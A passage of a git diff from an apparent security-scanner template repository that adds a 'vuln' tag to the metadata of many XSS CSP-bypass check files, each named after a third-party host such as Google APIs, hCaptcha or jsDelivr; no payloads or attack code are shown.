a/dast/vulnerabilities/xss/csp-bypass/fwmrm-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/fwmrm-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,fwmrm + tags: xss,csp-bypass,fwmrm,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/getdrip-api-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/getdrip-api-csp-bypass.yaml index b4133f5f468..6658f4bc605 100644 --- a/dast/vulnerabilities/xss/csp-bypass/getdrip-api-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/getdrip-api-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,getdrip-api + tags: xss,csp-bypass,getdrip-api,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/github-gist-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/github-gist-csp-bypass.yaml index 2236dab101d..d047964fc1c 100644 --- a/dast/vulnerabilities/xss/csp-bypass/github-gist-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/github-gist-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,github-gist + tags: xss,csp-bypass,github-gist,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/gitlab-page-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/gitlab-page-csp-bypass.yaml index 5d4be8b84bf..f1d3521e893 100644 --- a/dast/vulnerabilities/xss/csp-bypass/gitlab-page-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/gitlab-page-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,gitlab-page + tags: xss,csp-bypass,gitlab-page,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/go-dev-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/go-dev-csp-bypass.yaml index 6f74123b2d7..9f0494b6d55 100644 --- a/dast/vulnerabilities/xss/csp-bypass/go-dev-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/go-dev-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,go-dev + tags: xss,csp-bypass,go-dev,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/google-accounts-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/google-accounts-csp-bypass.yaml index 45287ebdb0b..f978daf8951 100644 --- a/dast/vulnerabilities/xss/csp-bypass/google-accounts-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/google-accounts-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,google-accounts + tags: xss,csp-bypass,google-accounts,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/google-ajax-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/google-ajax-csp-bypass.yaml index d13054a98d9..9f9bbf822fb 100644 --- a/dast/vulnerabilities/xss/csp-bypass/google-ajax-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/google-ajax-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,google-ajax + tags: xss,csp-bypass,google-ajax,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/google-analytics-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/google-analytics-csp-bypass.yaml index 1c2e753ad29..c1ea5fd7791 100644 --- a/dast/vulnerabilities/xss/csp-bypass/google-analytics-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/google-analytics-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,google-analytics + tags: xss,csp-bypass,google-analytics,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/google-apis-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/google-apis-csp-bypass.yaml index 2e116c0da8c..cd5fe2f3953 100644 --- a/dast/vulnerabilities/xss/csp-bypass/google-apis-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/google-apis-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,google-apis + tags: xss,csp-bypass,google-apis,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/google-clients1-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/google-clients1-csp-bypass.yaml index e1a89ef7517..9830043d20c 100644 --- a/dast/vulnerabilities/xss/csp-bypass/google-clients1-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/google-clients1-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,google-clients1 + tags: xss,csp-bypass,google-clients1,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/google-complete-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/google-complete-csp-bypass.yaml index e92867b6925..353c4c0bd4a 100644 --- a/dast/vulnerabilities/xss/csp-bypass/google-complete-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/google-complete-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,google-complete + tags: xss,csp-bypass,google-complete,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/google-maps-api-ssl-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/google-maps-api-ssl-csp-bypass.yaml index e12e38095bd..c317f0ca47c 100644 --- a/dast/vulnerabilities/xss/csp-bypass/google-maps-api-ssl-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/google-maps-api-ssl-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,google-maps-api-ssl + tags: xss,csp-bypass,google-maps-api-ssl,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/google-maps-apis-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/google-maps-apis-csp-bypass.yaml index e141c487e08..e4f13844003 100644 --- a/dast/vulnerabilities/xss/csp-bypass/google-maps-apis-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/google-maps-apis-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,google-maps-apis + tags: xss,csp-bypass,google-maps-apis,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/google-maps-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/google-maps-csp-bypass.yaml index caf4e793d09..32e9036c72c 100644 --- a/dast/vulnerabilities/xss/csp-bypass/google-maps-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/google-maps-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,google-maps + tags: xss,csp-bypass,google-maps,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/google-maps-de-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/google-maps-de-csp-bypass.yaml index 09695c33bd1..314f3ac8fa4 100644 --- a/dast/vulnerabilities/xss/csp-bypass/google-maps-de-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/google-maps-de-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,google-maps-de + tags: xss,csp-bypass,google-maps-de,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/google-maps-lv-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/google-maps-lv-csp-bypass.yaml index 7cbc83b3ceb..93b1199ad9e 100644 --- a/dast/vulnerabilities/xss/csp-bypass/google-maps-lv-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/google-maps-lv-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,google-maps-lv + tags: xss,csp-bypass,google-maps-lv,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/google-maps-ru-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/google-maps-ru-csp-bypass.yaml index 3ab29f4c48c..fe8fb5c7499 100644 --- a/dast/vulnerabilities/xss/csp-bypass/google-maps-ru-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/google-maps-ru-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,google-maps-ru + tags: xss,csp-bypass,google-maps-ru,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/google-recaptcha-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/google-recaptcha-csp-bypass.yaml index 3de25228871..0f4e731c94b 100644 --- a/dast/vulnerabilities/xss/csp-bypass/google-recaptcha-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/google-recaptcha-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,google-recaptcha + tags: xss,csp-bypass,google-recaptcha,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/google-tagmanager-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/google-tagmanager-csp-bypass.yaml index e278d71d1ee..c91a071affc 100644 --- a/dast/vulnerabilities/xss/csp-bypass/google-tagmanager-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/google-tagmanager-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,google-tagmanager + tags: xss,csp-bypass,google-tagmanager,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/google-translate-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/google-translate-csp-bypass.yaml index 3ac41ecf68e..50203094a02 100644 --- a/dast/vulnerabilities/xss/csp-bypass/google-translate-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/google-translate-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,google-translate + tags: xss,csp-bypass,google-translate,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/googleadservices-partner-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/googleadservices-partner-csp-bypass.yaml index dd5a36d8ba1..3f2887ff3a7 100644 --- a/dast/vulnerabilities/xss/csp-bypass/googleadservices-partner-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/googleadservices-partner-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,googleadservices-partner + tags: xss,csp-bypass,googleadservices-partner,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/googleapis-blogger-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/googleapis-blogger-csp-bypass.yaml index 80443421951..1e3f5b82ae8 100644 --- a/dast/vulnerabilities/xss/csp-bypass/googleapis-blogger-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/googleapis-blogger-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,googleapis-blogger + tags: xss,csp-bypass,googleapis-blogger,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/googleapis-customsearch-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/googleapis-customsearch-csp-bypass.yaml index 3babf8e8e6d..be8afff99b4 100644 --- a/dast/vulnerabilities/xss/csp-bypass/googleapis-customsearch-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/googleapis-customsearch-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,googleapis-customsearch + tags: xss,csp-bypass,googleapis-customsearch,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/googleapis-translate-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/googleapis-translate-csp-bypass.yaml index c51b86a607c..596f042197d 100644 --- a/dast/vulnerabilities/xss/csp-bypass/googleapis-translate-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/googleapis-translate-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,googleapis-translate + tags: xss,csp-bypass,googleapis-translate,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/googletagmanager-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/googletagmanager-csp-bypass.yaml index 476df109440..21b2515346c 100644 --- a/dast/vulnerabilities/xss/csp-bypass/googletagmanager-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/googletagmanager-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,googletagmanager + tags: xss,csp-bypass,googletagmanager,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/gravatar-secure-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/gravatar-secure-csp-bypass.yaml index 845c0f7784d..ad5713d2d73 100644 --- a/dast/vulnerabilities/xss/csp-bypass/gravatar-secure-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/gravatar-secure-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,gravatar-secure + tags: xss,csp-bypass,gravatar-secure,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/grubhub-assets-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/grubhub-assets-csp-bypass.yaml index 75f04302cdf..d41eed51df7 100644 --- a/dast/vulnerabilities/xss/csp-bypass/grubhub-assets-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/grubhub-assets-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,grubhub-assets + tags: xss,csp-bypass,grubhub-assets,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/gstatic-angular-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/gstatic-angular-csp-bypass.yaml index bb593fe2332..ca54f7bec52 100644 --- a/dast/vulnerabilities/xss/csp-bypass/gstatic-angular-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/gstatic-angular-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,gstatic-angular + tags: xss,csp-bypass,gstatic-angular,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/gstatic-recaptcha-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/gstatic-recaptcha-csp-bypass.yaml index 378f725e89b..c29737bf24f 100644 --- a/dast/vulnerabilities/xss/csp-bypass/gstatic-recaptcha-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/gstatic-recaptcha-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,gstatic-recaptcha + tags: xss,csp-bypass,gstatic-recaptcha,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/gstatic-ssl-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/gstatic-ssl-csp-bypass.yaml index 53614e115db..b0bd1712253 100644 --- a/dast/vulnerabilities/xss/csp-bypass/gstatic-ssl-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/gstatic-ssl-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,gstatic-ssl + tags: xss,csp-bypass,gstatic-ssl,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/hatenaapis-bookmark-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/hatenaapis-bookmark-csp-bypass.yaml index 50f6cbde271..be03c739504 100644 --- a/dast/vulnerabilities/xss/csp-bypass/hatenaapis-bookmark-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/hatenaapis-bookmark-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,hatenaapis-bookmark + tags: xss,csp-bypass,hatenaapis-bookmark,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/hcaptcha-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/hcaptcha-csp-bypass.yaml index 94f1c96da5f..725b91e577c 100644 --- a/dast/vulnerabilities/xss/csp-bypass/hcaptcha-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/hcaptcha-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,hcaptcha + tags: xss,csp-bypass,hcaptcha,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/hcaptcha-js-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/hcaptcha-js-csp-bypass.yaml index 06e5a9dc975..bdadf6a4b80 100644 --- a/dast/vulnerabilities/xss/csp-bypass/hcaptcha-js-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/hcaptcha-js-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,hcaptcha-js + tags: xss,csp-bypass,hcaptcha-js,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/here-api-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/here-api-csp-bypass.yaml index 8b4e2a5680a..1412949ed03 100644 --- a/dast/vulnerabilities/xss/csp-bypass/here-api-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/here-api-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,here-api + tags: xss,csp-bypass,here-api,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/hsforms-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/hsforms-csp-bypass.yaml index 2658d530703..269c842240a 100644 --- a/dast/vulnerabilities/xss/csp-bypass/hsforms-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/hsforms-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,hsforms + tags: xss,csp-bypass,hsforms,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/hubspot-forms-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/hubspot-forms-csp-bypass.yaml index b7e4701bb77..ada59618298 100644 --- a/dast/vulnerabilities/xss/csp-bypass/hubspot-forms-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/hubspot-forms-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,hubspot-forms + tags: xss,csp-bypass,hubspot-forms,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/ibm-api-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/ibm-api-csp-bypass.yaml index 24e3f4b8438..5b8d01c325c 100644 --- a/dast/vulnerabilities/xss/csp-bypass/ibm-api-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/ibm-api-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,ibm-api + tags: xss,csp-bypass,ibm-api,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/ieee-oamssoqae-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/ieee-oamssoqae-csp-bypass.yaml index b4c4b7e11f0..0ba35211b31 100644 --- a/dast/vulnerabilities/xss/csp-bypass/ieee-oamssoqae-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/ieee-oamssoqae-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,ieee-oamssoqae + tags: xss,csp-bypass,ieee-oamssoqae,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/im-apps-sync-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/im-apps-sync-csp-bypass.yaml index a227c874d51..29dfae5412f 100644 --- a/dast/vulnerabilities/xss/csp-bypass/im-apps-sync-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/im-apps-sync-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,im-apps-sync + tags: xss,csp-bypass,im-apps-sync,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/indeed-tr-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/indeed-tr-csp-bypass.yaml index 6203b551971..9cf070c7b90 100644 --- a/dast/vulnerabilities/xss/csp-bypass/indeed-tr-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/indeed-tr-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,indeed-tr + tags: xss,csp-bypass,indeed-tr,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/indeed-uk-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/indeed-uk-csp-bypass.yaml index 34ecc2eee5d..ac22633c073 100644 --- a/dast/vulnerabilities/xss/csp-bypass/indeed-uk-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/indeed-uk-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,indeed-uk + tags: xss,csp-bypass,indeed-uk,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/ip-api-edns-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/ip-api-edns-csp-bypass.yaml index ecfd0b3d590..8a7be6fd401 100644 --- a/dast/vulnerabilities/xss/csp-bypass/ip-api-edns-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/ip-api-edns-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,ip-api-edns + tags: xss,csp-bypass,ip-api-edns,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/ipify-api-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/ipify-api-csp-bypass.yaml index fc5102f5174..a07ef290ca6 100644 --- a/dast/vulnerabilities/xss/csp-bypass/ipify-api-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/ipify-api-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,ipify-api + tags: xss,csp-bypass,ipify-api,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/ipinfo-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/ipinfo-csp-bypass.yaml index 7b7a9578265..d15183e92b4 100644 --- a/dast/vulnerabilities/xss/csp-bypass/ipinfo-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/ipinfo-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,ipinfo + tags: xss,csp-bypass,ipinfo,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/itunes-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/itunes-csp-bypass.yaml index 6eeb3854e03..1d48ef75662 100644 --- a/dast/vulnerabilities/xss/csp-bypass/itunes-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/itunes-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,itunes + tags: xss,csp-bypass,itunes,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/jd-api-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/jd-api-csp-bypass.yaml index 5e3520b079e..a2220b20285 100644 --- a/dast/vulnerabilities/xss/csp-bypass/jd-api-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/jd-api-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,jd-api + tags: xss,csp-bypass,jd-api,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/jsdelivr-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/jsdelivr-csp-bypass.yaml index 3f670745775..631521ab8eb 100644 --- a/dast/vulnerabilities/xss/csp-bypass/jsdelivr-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/jsdelivr-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,jsdelivr + tags: xss,csp-bypass,jsdelivr,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/lijit-ap-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/lijit-ap-csp-bypass.yaml index 2ab03905fba..949c7479b8f 100644 --- a/dast/vulnerabilities/xss/csp-bypass/lijit-ap-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/lijit-ap-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,lijit-ap + tags: xss,csp-bypass,lijit-ap,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/livechatinc-api-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/livechatinc-api-csp-bypass.yaml index 5edb593c522..d3e517cc7a6 100644 --- a/dast/vulnerabilities/xss/csp-bypass/livechatinc-api-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/livechatinc-api-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,livechatinc-api + tags: xss,csp-bypass,livechatinc-api,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/liveperson-lptag-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/liveperson-lptag-csp-bypass.yaml index 42e80f4a8ec..5230b166a72 100644 --- a/dast/vulnerabilities/xss/csp-bypass/liveperson-lptag-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/liveperson-lptag-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - 